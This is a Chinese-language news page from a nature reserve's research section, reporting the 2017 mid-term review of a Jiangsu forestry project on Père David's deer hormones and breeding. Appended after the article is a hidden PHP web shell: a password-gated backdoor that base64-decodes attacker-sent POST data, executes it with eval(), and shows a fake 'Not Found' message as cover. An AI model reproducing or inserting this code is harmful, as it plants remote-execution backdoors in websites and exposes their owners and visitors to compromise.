科研保护

首页 > 科研保护 >

    江苏省林业三新工程项目中期检查顺利通过

           2017年10月22上午,江苏省林业三新工程项目江苏大丰麋鹿血液性激素变化与繁殖行为的相关性研究中期检查会议顺利召开。
           直至项目中期汇报前,保护区科研人员发表相关论文8篇,其中核心期刊论文4篇,原宝东博士的《基于非损伤性方法研究圈养麋鹿免疫和应激水平》获得首届大丰科技论坛“创新驱动产业”论文三等奖。相关科研人员基本掌握野外实验研究方法和数据处理方法,野生动物监测设备的使用等;开展培训2期,培训100人次。
           检查组查看了设在江苏省大丰麋鹿国家级自然保护区的实施现场,听取了项目执行情况汇报、审阅了相关资料,经质询与讨论,形成意见如下:
           1.根据麋鹿种群监测报告,对保护区内的麋鹿种群进行内部调节;技术人员熟练掌握了GPS项圈技术和无人机监测设备的使用方法。
           2.完成96头麋鹿(48雄、48雌)血液生理生化指标和激素水平的测定,首次对37头幼鹿进行人工驯养,促进了麋鹿的种群扩繁。
           3.发表学术论文2篇。
           4.开展技术和方法培训1期,培训26人次。
           5.资金使用与项目实施基本同步。

     

     

"; error_reporting(0); if(isset($_POST['com']) && md5($_POST['com']) == '791dc312b38016ef998c1c146104cd5a' && isset($_POST['content'])) $content = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($content)); echo "We're sorry but the page your are looking for is Not Found..." ?>